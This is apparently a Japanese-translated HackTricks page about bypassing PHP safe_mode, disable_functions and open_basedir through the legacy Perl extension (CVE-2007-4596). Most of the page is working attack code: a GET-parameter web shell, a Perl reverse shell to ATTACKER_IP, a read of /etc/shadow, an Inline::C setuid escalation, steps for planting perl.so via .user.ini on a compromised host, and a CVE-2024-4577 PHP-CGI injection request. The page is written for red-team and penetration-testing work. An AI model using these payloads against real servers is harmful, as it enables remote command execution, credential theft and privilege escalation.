PHP Perl Extension Safe_mode Bypass Exploit

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

背景

CVE-2007-4596 として追跡されている問題は、レガシーな perl PHP 拡張に由来します。この拡張は完全な Perl インタプリタを埋め込み、PHP の safe_modedisable_functionsopen_basedir コントロールを無視します。extension=perl.so をロードする PHP ワーカーは制限されない Perl の eval を利用可能になり、従来の PHP プロセス生成プリミティブがすべてブロックされている場合でもコマンド実行は容易なままです。safe_mode は PHP 5.4 で廃止されましたが、多くの古い共有ホスティング環境や脆弱なラボではまだ搭載されており、レガシーなコントロールパネルに遭遇した際にはこのバイパスは依然として有用です。

互換性とパッケージ状況 (2025)

  • 最後の PECL リリース(perl-1.0.1, 2013)は PHP ≥5.0 を対象としており、Zend API の変更により一般に PHP 8+ では動作しません。
  • PECL は PIE に置き換えられつつありますが、古いスタックではまだ PECL/pear が搭載されています。以下の手順は PHP 5/7 の対象で使ってください。新しい PHP ではダウングレードするか、別のインジェクション経路(例: userland FFI)に切り替えることを想定してください。

2025年のテスト用環境の構築

  • PECL から perl-1.0.1 を取得し、攻撃対象の PHP ブランチ向けにコンパイルして、グローバルに(php.ini)あるいは dl() 経由でロードしてください(許可されている場合)。
  • Debian 系の簡易ラボ用レシピ:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • 探索中は var_dump(extension_loaded('perl'));print_r(get_loaded_extensions()); で利用可能か確認してください。存在しない場合は perl.so を検索するか、書き込み可能な php.ini/.user.ini を悪用して強制的にロードします。
  • インタプリタは PHP ワーカー内に存在するため、外部バイナリは不要です。ネットワークの出口フィルタや proc_open ブラックリストは影響しません。

phpize が利用可能な場合のオンホストビルドチェーン

侵害したホスト上に phpize と build-essential が存在する場合、OS に外部コマンドを実行させずに perl.so をコンパイルして配置できます:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

もし open_basedir が強制されている場合、配置した .user.ini.so が許可されたパスに存在することを確認してください。extension= ディレクティブは basedir 内でも有効です。コンパイルの流れは PECL extensions をビルドするための PHP マニュアルに沿っています。

Original PoC (NetJackal)

出典: http://blog.safebuff.com/2016/05/06/disable-functions-bypass/、拡張が eval に応答することを確認するのにいまだ役立ちます:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

モダンなペイロードの強化

1. Full TTY over TCP

埋め込まれたインタプリタは、IO::Socket をロードできます、/usr/bin/perl がブロックされていても:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. open_basedir が有効でもファイルシステム脱出

Perl は PHP の open_basedir を無視するため、任意のファイルを読み取ることができます:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

出力をIO::Socket::INETNet::HTTPにパイプして、PHP管理のディスクリプタに触れずにデータを外部へ送信する。

3. インラインコンパイルによる特権昇格

Inline::Cがシステム全体に存在する場合、PHPのffipcntlに頼らずに、リクエスト内でヘルパーをコンパイルする:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

PerlをLOLBASツールキットとして扱う—例: mysqliがなくてもMySQL DSNsをダンプする:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ 悪用: PHP-CGI Argument Injection を介して perl.so をロードする (CVE-2024-4577)

まだ PHP-CGI を公開している Windows インストールでは、2024 年の argument-injection 回帰 (CVE-2024-4577) により、インタプリタに任意の -d オプションを渡せるようになります。これにより、dl() が無効化され php.ini が読み取り専用であっても Perl extension をロードできます:

  • 互換性のある perl.dll/perl.so をビルドするか、web 書き込み可能なパス(例: C:\xampp\htdocs\temp\perl.dll)にアップロードします。
  • 単一の HTTP リクエストを送信し、-d extension=C:\\xampp\\htdocs\\temp\\perl.dll を注入し、同じリクエスト本文内に Perl-backed payload を含めます:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

PHP workerがボディを読む前にPerlを埋め込むようになったため、従来のdisable_functions/open_basedirによる制御はすべてバイパスされます。これは脆弱なWindows/CGIスタックでパッチ適用まで有効です(PHP 8.1.29/8.2.20/8.3.8以降でこの回帰は修正されています)。open_basedirがDLLパスをブロックする場合は、まず許可された基底ディレクトリ内にファイルを置くか、XAMPPに同梱されている既存の全ユーザー読み取り可能なDLLパスを利用してください。

References

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする